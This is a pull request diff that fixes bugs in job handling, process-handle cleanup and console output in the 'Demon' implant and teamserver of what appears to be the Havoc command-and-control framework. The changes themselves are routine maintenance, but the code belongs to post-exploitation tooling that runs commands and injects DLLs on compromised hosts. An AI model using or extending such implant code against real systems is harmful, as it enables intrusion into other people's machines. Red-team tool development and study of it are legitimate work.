### PR TITLE
fix a few bugs on Jobs.c + add some refactors

### DIFF
--- a/payloads/Demon/Source/Core/Command.c
+++ b/payloads/Demon/Source/Core/Command.c
@@ -443,7 +443,6 @@ VOID CommandProc( PPARSER Parser )
             PRINTF( "Process Verbose : %s [%d]\n", ProcessVerbose ? "TRUE" : "FALSE", ProcessVerbose );
 
             // TODO: make it optional to choose process arch
-            // TODO: cleanup process info
             if ( ! ProcessCreate( TRUE, Process, ProcessArgs, ProcessState, &ProcessInfo, ProcessPiped, NULL ) )
             {
                 PackageDestroy( Package );
@@ -454,8 +453,9 @@ VOID CommandProc( PPARSER Parser )
                 if ( ProcessVerbose )
                     PackageAddInt32( Package, ProcessInfo.dwProcessId );
 
-                Instance.Win32.NtClose( ProcessInfo.hProcess );
                 Instance.Win32.NtClose( ProcessInfo.hThread );
+                if ( ! ProcessPiped )
+                    Instance.Win32.NtClose( ProcessInfo.hProcess );
 
                 PRINTF( "Successful spawned process: %d\n", ProcessInfo.dwProcessId );
             }
@@ -2833,7 +2833,6 @@ VOID CommandExit( PPARSER Parser )
         JobList = JobList->Next;
 
         JobKill( JobID );
-        JobRemove( JobID );
     }
 
     // close all sockets

--- a/teamserver/pkg/agent/demons.go
+++ b/teamserver/pkg/agent/demons.go
@@ -2091,7 +2091,7 @@ func (a *Agent) TaskDispatch(CommandID int, Parser *parser.Parser, teamserver Te
 				Output += fmt.Sprintf(" %-6s  %-13s  %-5s\n", "Job ID", "Type", "State")
 				Output += fmt.Sprintf(" %-6s  %-13s  %-5s\n", "------", "----", "-----")
 
-				if Parser.Length() > 4 {
+				for Parser.Length() > 4 {
 					var (
 						JobID int
 						Type  int
@@ -2594,8 +2594,9 @@ func (a *Agent) TaskDispatch(CommandID int, Parser *parser.Parser, teamserver Te
 		Output["Type"] = "Good"
 		Output["Output"] = string(Parser.ParseBytes())
 		Output["Message"] = fmt.Sprintf("Received Output [%v bytes]:", len(Output["Output"]))
-
-		teamserver.AgentConsole(a.NameID, HAVOC_CONSOLE_MESSAGE, Output)
+		if len(Output["Output"]) > 0 {
+			teamserver.AgentConsole(a.NameID, HAVOC_CONSOLE_MESSAGE, Output)
+		}
 
 	case CALLBACK_OUTPUT_OEM:
 		logger.Debug(fmt.Sprintf("Agent: %x, Command: CALLBACK_OUTPUT_OEM", AgentID))
@@ -2604,8 +2605,9 @@ func (a *Agent) TaskDispatch(CommandID int, Parser *parser.Parser, teamserver Te
 		Output["Type"] = "Good"
 		Output["Output"] = common.DecodeUTF16(Parser.ParseBytes())
 		Output["Message"] = fmt.Sprintf("Received Output [%v bytes]:", len(Output["Output"]))
-
-		teamserver.AgentConsole(a.NameID, HAVOC_CONSOLE_MESSAGE, Output)
+		if len(Output["Output"]) > 0 {
+			teamserver.AgentConsole(a.NameID, HAVOC_CONSOLE_MESSAGE, Output)
+		}
 
 	case COMMAND_INJECT_DLL:
 		logger.Debug(fmt.Sprintf("Agent: %x, Command: COMMAND_INJECT_DLL", AgentID))


### PR DESCRIPTION
The following bugs were fixed:
- when a process was created with `shell C:\foo`, a Job was created and left dead for ever
- when listing jobs, only the first one was shown
- some commands like `job kill <job id>` failed to find the specified job

Refactors:
- better handling of anon pipes while reading stdout and stderr from created processes
- if 0 bytes are read, not this is not send to the operator's console